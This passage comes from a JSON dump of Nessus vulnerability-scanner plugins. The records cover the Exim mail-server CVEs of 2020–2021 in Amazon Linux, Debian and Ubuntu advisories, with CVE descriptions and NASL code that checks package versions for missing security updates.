(CVE-2020-28009)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Write because the main function, while setuid root, copies the current working directory pathname into a buffer that is too small (on some common platforms).\n (CVE-2020-28010)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S.\n This may cause privilege escalation from exim to root. (CVE-2020-28011)\n\n - Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret uses a privileged pipe that lacks a close-on-exec flag. (CVE-2020-28012)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles -F '.(' on the command line, and thus may allow privilege escalation from any user to root. This occurs because of the interpretation of negative sizes in strncpy. (CVE-2020-28013)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the exim user, and allows a denial of service because root-owned files can be overwritten. (CVE-2020-28014)\n\n - Exim 4 before 4.94.2 has Improper Initialization that can lead to recursion-based stack consumption or other consequences. This occurs because use of certain getc functions is mishandled when a client uses BDAT instead of DATA. (CVE-2020-28019)\n\n - Exim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer.\n This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands. (CVE-2020-28022)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Read. smtp_setup_msg may disclose sensitive information from process memory to an unauthenticated SMTP client. (CVE-2020-28023)\n\n - Exim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can actually push back non-character error codes such as EOF. (CVE-2020-28024)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to a leak of sensitive information from process memory. (CVE-2020-28025)\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary commands as root. (CVE-2020-28026)\n\n - Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race condition, a local user can delete arbitrary files as root. This involves the -oP and -oPX options.\n (CVE-2021-27216)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-08-05T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : exim (ALAS-2022-1622)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28019", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2022-08-30T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:exim", "p-cpe:/a:amazon:linux:exim-debuginfo", "p-cpe:/a:amazon:linux:exim-greylist", "p-cpe:/a:amazon:linux:exim-mon", "p-cpe:/a:amazon:linux:exim-mysql", "p-cpe:/a:amazon:linux:exim-pgsql", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2022-1622.NASL", "href": "https://www.tenable.com/plugins/nessus/163870", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2022-1622.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163870);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/30\");\n\n script_cve_id(\n \"CVE-2020-28007\",\n \"CVE-2020-28008\",\n \"CVE-2020-28009\",\n \"CVE-2020-28010\",\n \"CVE-2020-28011\",\n \"CVE-2020-28012\",\n \"CVE-2020-28013\",\n \"CVE-2020-28014\",\n \"CVE-2020-28019\",\n \"CVE-2020-28022\",\n \"CVE-2020-28023\",\n \"CVE-2020-28024\",\n \"CVE-2020-28025\",\n \"CVE-2020-28026\",\n \"CVE-2021-27216\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0216-S\");\n\n script_name(english:\"Amazon Linux AMI : exim (ALAS-2022-1622)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of exim installed on the remote host is prior to 4.92-1.33. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS-2022-1622 advisory.\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the\n log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root-\n owned files anywhere on the filesystem. (CVE-2020-28007)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the\n spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header\n file, in which a crafted recipient address can indirectly lead to command execution. (CVE-2020-28008)\n\n - Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded\n reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be\n impractical because of the execution time needed to overflow (multiple days). (CVE-2020-28009)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Write because the main function, while setuid root, copies the\n current working directory pathname into a buffer that is too small (on some common platforms).\n (CVE-2020-28010)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S.\n This may cause privilege escalation from exim to root. (CVE-2020-28011)\n\n - Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret\n uses a privileged pipe that lacks a close-on-exec flag. (CVE-2020-28012)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles -F '.(' on the command\n line, and thus may allow privilege escalation from any user to root. This occurs because of the\n interpretation of negative sizes in strncpy. (CVE-2020-28013)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the exim\n user, and allows a denial of service because root-owned files can be overwritten. (CVE-2020-28014)\n\n - Exim 4 before 4.94.2 has Improper Initialization that can lead to recursion-based stack consumption or\n other consequences. This occurs because use of certain getc functions is mishandled when a client uses\n BDAT instead of DATA. (CVE-2020-28019)\n\n - Exim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer.\n This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands. (CVE-2020-28022)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Read. smtp_setup_msg may disclose sensitive information from\n process memory to an unauthenticated SMTP client. (CVE-2020-28023)\n\n - Exim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers\n executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can\n actually push back non-character error codes such as EOF. (CVE-2020-28024)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the\n relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to\n a leak of sensitive information from process memory. (CVE-2020-28025)\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default\n configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline\n into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary\n commands as root. (CVE-2020-28026)\n\n - Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race\n condition, a local user can delete arbitrary files as root. This involves the -oP and -oPX options.\n (CVE-2021-27216)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2022-1622.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28007.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28008.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28009.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28011.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28012.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28013.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28014.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28019.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28022.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28023.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28024.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28025.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28026.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-27216.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update exim' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28026\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-greylist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'exim-4.92-1.33.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-4.92-1.33.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-debuginfo-4.92-1.33.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-debuginfo-4.92-1.33.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-greylist-4.92-1.33.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-greylist-4.92-1.33.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-mon-4.92-1.33.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-mon-4.92-1.33.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-mysql-4.92-1.33.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-mysql-4.92-1.33.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-pgsql-4.92-1.33.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-pgsql-4.92-1.33.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-greylist / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T15:59:14", "description": "The Qualys Research Labs reported several vulnerabilities in Exim, a mail transport agent, which could result in local privilege escalation and remote code execution.\n\nDetails can be found in the Qualys advisory at https://www.qualys.com/2021/05/04/21nails/21nails.txt", "cvss3": {}, "published": "2021-05-05T00:00:00", "type": "nessus", "title": "Debian DSA-4912-1 : exim4 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28017", "CVE-2020-28019", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2022-09-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4912.NASL", "href": "https://www.tenable.com/plugins/nessus/149275", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4912. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149275);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/09/06\");\n\n script_cve_id(\"CVE-2020-28007\", \"CVE-2020-28008\", \"CVE-2020-28009\", \"CVE-2020-28010\", \"CVE-2020-28011\", \"CVE-2020-28012\", \"CVE-2020-28013\", \"CVE-2020-28014\", \"CVE-2020-28015\", \"CVE-2020-28017\", \"CVE-2020-28019\", \"CVE-2020-28021\", \"CVE-2020-28022\", \"CVE-2020-28023\", \"CVE-2020-28024\", \"CVE-2020-28025\", \"CVE-2020-28026\");\n script_xref(name:\"DSA\", value:\"4912\");\n script_xref(name:\"IAVA\", value:\"2021-A-0216-S\");\n\n script_name(english:\"Debian DSA-4912-1 : exim4 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Qualys Research Labs reported several vulnerabilities in Exim, a\nmail transport agent, which could result in local privilege escalation\nand remote code execution.\n\nDetails can be found in the Qualys advisory at\nhttps://www.qualys.com/2021/05/04/21nails/21nails.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.qualys.com/2021/05/04/21nails/21nails.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4912\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the exim4 packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 4.92-8+deb10u6.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28026\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"exim4\", reference:\"4.92-8+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"exim4-base\", reference:\"4.92-8+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"exim4-config\", reference:\"4.92-8+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.92-8+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"exim4-daemon-light\", reference:\"4.92-8+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"exim4-dev\", reference:\"4.92-8+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"eximon4\", reference:\"4.92-8+deb10u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T15:58:51", "description": "The remote Ubuntu 16.04 LTS host has packages installed that are affected by multiple vulnerabilities as referenced in the USN-4934-2 advisory.\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root- owned files anywhere on the filesystem. (CVE-2020-28007)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header file, in which a crafted recipient address can indirectly lead to command execution. (CVE-2020-28008)\n\n - Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be impractical because of the execution time needed to overflow (multiple days). (CVE-2020-28009)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S.\n This may cause privilege escalation from exim to root. (CVE-2020-28011)\n\n - Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret uses a privileged pipe that lacks a close-on-exec flag. (CVE-2020-28012)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles -F '.(' on the command line, and thus may allow privilege escalation from any user to root. This occurs because of the interpretation of negative sizes in strncpy. (CVE-2020-28013)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the exim user, and allows a denial of service because root-owned files can be overwritten. (CVE-2020-28014)\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. Local users can alter the behavior of root processes because a recipient address can have a newline character. (CVE-2020-28015)\n\n - Exim 4 before 4.94.2 allows an off-by-two Out-of-bounds Write because -F '' is mishandled by parse_fix_phrase. (CVE-2020-28016)\n\n - Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in receive_add_recipient via an e-mail message with fifty million recipients. NOTE: remote exploitation may be difficult because of resource consumption. (CVE-2020-28017)\n\n - Exim 4 before 4.92 allows Integer Overflow to Buffer Overflow, in which an unauthenticated remote attacker can execute arbitrary code by leveraging the mishandling of continuation lines during header-length restriction. (CVE-2020-28020)\n\n - Exim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer.\n This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands. (CVE-2020-28022)\n\n - Exim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can actually push back non-character error codes such as EOF. (CVE-2020-28024)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to a leak of sensitive information from process memory. (CVE-2020-28025)\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary commands as root. (CVE-2020-28026)\n\n - Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race condition, a local user can delete arbitrary files as root. This involves the -oP and -oPX options.\n (CVE-2021-27216)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-05-06T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS : Exim vulnerabilities (USN-4934-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28020", "CVE-2020-28022", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:exim4", "p-cpe:/a:canonical:ubuntu_linux:exim4-base", "p-cpe:/a:canonical:ubuntu_linux:exim4-config", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light", "p-cpe:/a:canonical:ubuntu_linux:exim4-dev", "p-cpe:/a:canonical:ubuntu_linux:eximon4"], "id": "UBUNTU_USN-4934-2.NASL", "href": "https://www.tenable.com/plugins/nessus/149323", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4934-2. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149323);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2020-28007\",\n \"CVE-2020-28008\",\n \"CVE-2020-28009\",\n \"CVE-2020-28011\",\n \"CVE-2020-28012\",\n \"CVE-2020-28013\",\n \"CVE-2020-28014\",\n \"CVE-2020-28015\",\n \"CVE-2020-28016\",\n \"CVE-2020-28017\",\n \"CVE-2020-28020\",\n \"CVE-2020-28022\",\n \"CVE-2020-28024\",\n \"CVE-2020-28025\",\n \"CVE-2020-28026\",\n \"CVE-2021-27216\"\n );\n script_xref(name:\"USN\", value:\"4934-2\");\n script_xref(name:\"IAVA\", value:\"2021-A-0216-S\");\n\n script_name(english:\"Ubuntu 16.04 LTS : Exim vulnerabilities (USN-4934-2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe USN-4934-2 advisory.\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the\n log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root-\n owned files anywhere on the filesystem. (CVE-2020-28007)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the\n spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header\n file, in which a crafted recipient address can indirectly lead to command execution. (CVE-2020-28008)\n\n - Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded\n reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be\n impractical because of the execution time needed to overflow (multiple days). (CVE-2020-28009)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S.\n This may cause privilege escalation from exim to root. (CVE-2020-28011)\n\n - Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret\n uses a privileged pipe that lacks a close-on-exec flag. (CVE-2020-28012)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles -F '.(' on the command\n line, and thus may allow privilege escalation from any user to root. This occurs because of the\n interpretation of negative sizes in strncpy. (CVE-2020-28013)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the exim\n user, and allows a denial of service because root-owned files can be overwritten. (CVE-2020-28014)\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. Local users can alter the behavior of\n root processes because a recipient address can have a newline character. (CVE-2020-28015)\n\n - Exim 4 before 4.94.2 allows an off-by-two Out-of-bounds Write because -F '' is mishandled by\n parse_fix_phrase. (CVE-2020-28016)\n\n - Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in 